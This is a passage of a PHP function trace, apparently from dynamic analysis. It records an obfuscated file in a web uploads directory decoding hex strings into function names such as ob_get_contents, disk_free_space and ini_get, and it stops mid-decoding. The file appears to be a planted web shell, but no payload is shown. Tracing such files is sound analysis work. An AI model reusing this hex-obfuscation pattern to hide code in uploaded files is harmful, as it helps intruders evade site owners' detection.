2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	509	0	0.020792	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	509	1	0.020803	720816
3	509	R			116
3	510	0	0.020816	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	510	1	0.020826	720776
3	510	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	511	0	0.020856	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	511	1	0.020868	720816
3	511	R			115
3	512	0	0.020880	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	512	1	0.020891	720776
3	512	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	482	1	0.020921	720736
2	482	R			'ob_get_contents'
1		A						/var/www/html/uploads/1CTT.php	7	$func[26] = 'ob_get_contents'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	513	0	0.020956	720736	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6f625f656e645f636c65616e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 23
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	514	0	0.020998	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	514	1	0.021010	720816
3	514	R			111
3	515	0	0.021023	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	515	1	0.021034	720776
3	515	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	516	0	0.021068	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	516	1	0.021080	720848
3	516	R			98
3	517	0	0.021093	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	517	1	0.021104	720808
3	517	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	518	0	0.021135	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	518	1	0.021147	720848
3	518	R			95
3	519	0	0.021159	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	519	1	0.021170	720808
3	519	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	520	0	0.021200	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	520	1	0.021212	720848
3	520	R			101
3	521	0	0.021225	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	521	1	0.021236	720808
3	521	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	522	0	0.021266	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	522	1	0.021278	720848
3	522	R			110
3	523	0	0.021290	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	523	1	0.021301	720808
3	523	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	524	0	0.021331	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	524	1	0.021343	720848
3	524	R			100
3	525	0	0.021355	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	525	1	0.021366	720808
3	525	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	526	0	0.021396	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	526	1	0.021407	720848
3	526	R			95
3	527	0	0.021420	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	527	1	0.021431	720808
3	527	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	528	0	0.021461	720800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	528	1	0.021473	720848
3	528	R			99
3	529	0	0.021485	720768	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	529	1	0.021496	720808
3	529	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	530	0	0.021525	720808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	530	1	0.021537	720856
3	530	R			108
3	531	0	0.021549	720776	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	531	1	0.021560	720816
3	531	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	532	0	0.021590	720808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	532	1	0.021601	720856
3	532	R			101
3	533	0	0.021613	720776	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	533	1	0.021624	720816
3	533	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	534	0	0.021654	720808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	534	1	0.021665	720856
3	534	R			97
3	535	0	0.021677	720776	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	535	1	0.021688	720816
3	535	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	536	0	0.021718	720808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	536	1	0.021730	720856
3	536	R			110
3	537	0	0.021742	720776	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	537	1	0.021753	720816
3	537	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	513	1	0.021787	720776
2	513	R			'ob_end_clean'
1		A						/var/www/html/uploads/1CTT.php	7	$func[27] = 'ob_end_clean'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	538	0	0.021822	720776	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6469726e616d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	539	0	0.021863	720808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	539	1	0.021874	720856
3	539	R			100
3	540	0	0.021886	720776	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	540	1	0.021897	720816
3	540	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	541	0	0.021928	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	541	1	0.021940	720888
3	541	R			105
3	542	0	0.021952	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	542	1	0.021963	720848
3	542	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	543	0	0.021994	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	543	1	0.022005	720888
3	543	R			114
3	544	0	0.022018	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	544	1	0.022028	720848
3	544	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	545	0	0.022059	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	545	1	0.022070	720888
3	545	R			110
3	546	0	0.022082	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	546	1	0.022092	720848
3	546	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	547	0	0.022123	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	547	1	0.022134	720888
3	547	R			97
3	548	0	0.022146	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	548	1	0.022157	720848
3	548	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	549	0	0.022187	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	549	1	0.022198	720888
3	549	R			109
3	550	0	0.022210	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	550	1	0.022221	720848
3	550	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	551	0	0.022251	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	551	1	0.022263	720888
3	551	R			101
3	552	0	0.022275	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	552	1	0.022286	720848
3	552	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	538	1	0.022316	720808
2	538	R			'dirname'
1		A						/var/www/html/uploads/1CTT.php	7	$func[28] = 'dirname'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	553	0	0.022350	720808	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6469736b5f746f74616c5f7370616365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 31
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	554	0	0.022392	720840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	554	1	0.022403	720888
3	554	R			100
3	555	0	0.022415	720808	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	555	1	0.022427	720848
3	555	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	556	0	0.022457	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	556	1	0.022468	720920
3	556	R			105
3	557	0	0.022480	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	557	1	0.022494	720880
3	557	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	558	0	0.022524	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	558	1	0.022536	720920
3	558	R			115
3	559	0	0.022549	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	559	1	0.022560	720880
3	559	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	560	0	0.022590	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	560	1	0.022601	720920
3	560	R			107
3	561	0	0.022622	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	561	1	0.022634	720880
3	561	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	562	0	0.022664	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	562	1	0.022675	720920
3	562	R			95
3	563	0	0.022688	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	563	1	0.022699	720880
3	563	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	564	0	0.022729	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	564	1	0.022740	720920
3	564	R			116
3	565	0	0.022752	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	565	1	0.022763	720880
3	565	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	566	0	0.022792	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	566	1	0.022804	720920
3	566	R			111
3	567	0	0.022816	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	567	1	0.022827	720880
3	567	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	568	0	0.022857	720872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	568	1	0.022869	720920
3	568	R			116
3	569	0	0.022881	720840	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	569	1	0.022893	720880
3	569	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	570	0	0.022922	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	570	1	0.022934	720928
3	570	R			97
3	571	0	0.022946	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	571	1	0.022958	720888
3	571	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	572	0	0.022987	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	572	1	0.022998	720928
3	572	R			108
3	573	0	0.023011	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	573	1	0.023022	720888
3	573	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	574	0	0.023052	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	574	1	0.023064	720928
3	574	R			95
3	575	0	0.023076	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	575	1	0.023086	720888
3	575	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	576	0	0.023117	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	576	1	0.023128	720928
3	576	R			115
3	577	0	0.023140	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	577	1	0.023152	720888
3	577	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	578	0	0.023181	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	578	1	0.023193	720928
3	578	R			112
3	579	0	0.023205	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	579	1	0.023216	720888
3	579	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	580	0	0.023250	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	580	1	0.023261	720928
3	580	R			97
3	581	0	0.023274	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	581	1	0.023284	720888
3	581	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	582	0	0.023314	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	582	1	0.023325	720928
3	582	R			99
3	583	0	0.023337	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	583	1	0.023348	720888
3	583	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	584	0	0.023377	720880	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	584	1	0.023389	720928
3	584	R			101
3	585	0	0.023401	720848	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	585	1	0.023412	720888
3	585	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	553	1	0.023442	720856
2	553	R			'disk_total_space'
1		A						/var/www/html/uploads/1CTT.php	7	$func[29] = 'disk_total_space'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	586	0	0.023477	720856	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6469736b5f667265655f7370616365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 29
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	587	0	0.023519	720888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	587	1	0.023530	720936
3	587	R			100
3	588	0	0.023542	720856	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	588	1	0.023554	720896
3	588	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	589	0	0.023584	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	589	1	0.023595	720968
3	589	R			105
3	590	0	0.023608	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	590	1	0.023619	720928
3	590	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	591	0	0.023649	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	591	1	0.023660	720968
3	591	R			115
3	592	0	0.023673	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	592	1	0.023684	720928
3	592	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	593	0	0.023715	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	593	1	0.023726	720968
3	593	R			107
3	594	0	0.023738	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	594	1	0.023750	720928
3	594	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	595	0	0.023780	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	595	1	0.023791	720968
3	595	R			95
3	596	0	0.023804	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	596	1	0.023814	720928
3	596	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	597	0	0.023845	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	597	1	0.023856	720968
3	597	R			102
3	598	0	0.023868	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	598	1	0.023880	720928
3	598	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	599	0	0.023912	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	599	1	0.023938	720968
3	599	R			114
3	600	0	0.023951	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	600	1	0.023965	720928
3	600	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	601	0	0.023996	720920	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	601	1	0.024007	720968
3	601	R			101
3	602	0	0.024020	720888	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	602	1	0.024031	720928
3	602	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	603	0	0.024061	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	603	1	0.024073	720976
3	603	R			101
3	604	0	0.024085	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	604	1	0.024096	720936
3	604	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	605	0	0.024125	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	605	1	0.024137	720976
3	605	R			95
3	606	0	0.024149	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	606	1	0.024160	720936
3	606	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	607	0	0.024190	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	607	1	0.024201	720976
3	607	R			115
3	608	0	0.024213	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	608	1	0.024224	720936
3	608	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	609	0	0.024254	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	609	1	0.024265	720976
3	609	R			112
3	610	0	0.024277	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	610	1	0.024288	720936
3	610	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	611	0	0.024317	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	611	1	0.024328	720976
3	611	R			97
3	612	0	0.024341	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	612	1	0.024352	720936
3	612	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	613	0	0.024382	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	613	1	0.024392	720976
3	613	R			99
3	614	0	0.024404	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	614	1	0.024415	720936
3	614	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	615	0	0.024444	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	615	1	0.024455	720976
3	615	R			101
3	616	0	0.024467	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	616	1	0.024479	720936
3	616	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	586	1	0.024508	720896
2	586	R			'disk_free_space'
1		A						/var/www/html/uploads/1CTT.php	7	$func[30] = 'disk_free_space'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	617	0	0.024543	720896	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'696e695f676574'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	618	0	0.024584	720928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	618	1	0.024595	720976
3	618	R			105
3	619	0	0.024608	720896	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	619	1	0.024619	720936
3	619	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	620	0	0.024650	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	620	1	0.024661	721008
3	620	R			110
3	621	0	0.024679	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	621	1	0.024690	720968
3	621	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	622	0	0.024721	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	622	1	0.024732	721008
3	622	R			105
3	623	0	0.024745	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	623	1	0.024756	720968
3	623	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	624	0	0.024786	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	624	1	0.024797	721008
3	624	R			95
3	625	0	0.024810	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	625	1	0.024821	720968
3	625	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	626	0	0.024851	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	626	1	0.024863	721008
3	626	R			103
3	627	0	0.024875	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	627	1	0.024886	720968
3	627	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	628	0	0.024916	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	628	1	0.024927	721008
3	628	R			101
3	629	0	0.024939	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	629	1	0.024950	720968
3	629	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	630	0	0.024980	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	630	1	0.024991	721008
3	630	R			116
3	631	0	0.025003	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	631	1	0.025014	720968
3	631	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	617	1	0.025044	720928
2	617	R			'ini_get'
1		A						/var/www/html/uploads/1CTT.php	7	$func[31] = 'ini_get'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	632	0	0.025078	720928	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'707265675f6d617463685f616c6c'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 27
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	633	0	0.025120	720960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	633	1	0.025132	721008
3	633	R			112
3	634	0	0.025145	720928	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	634	1	0.025156	720968
3	634	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	635	0	0.025187	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	635	1	0.025198	721040
3	635	R			114
3	636	0	0.025210	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	636	1	0.025221	721000
3	636	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	637	0	0.025252	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	637	1	0.025263	721040
3	637	R			101
3	638	0	0.025275	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	638	1	0.025287	721000
3	638	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	639	0	0.025317	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	639	1	0.025328	721040
3	639	R			103
3	640	0	0.025341	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	640	1	0.025352	721000
3	640	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	641	0	0.025381	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	641	1	0.025396	721040
3	641	R			95
3	642	0	0.025408	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	642	1	0.025420	721000
3	642	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	643	0	0.025449	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	643	1	0.025460	721040
3	643	R			109
3	644	0	0.025473	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	644	1	0.025484	721000
3	644	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	645	0	0.025514	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	645	1	0.025525	721040
3	645	R			97
3	646	0	0.025537	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	646	1	0.025549	721000
3	646	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	647	0	0.025579	720992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	647	1	0.025590	721040
3	647	R			116
3	648	0	0.025602	720960	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	648	1	0.025613	721000
3	648	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	649	0	0.025643	721000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	649	1	0.025654	721048
3	649	R			99
3	650	0	0.025666	720968	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	650	1	0.025677	721008
3	650	R			'c'
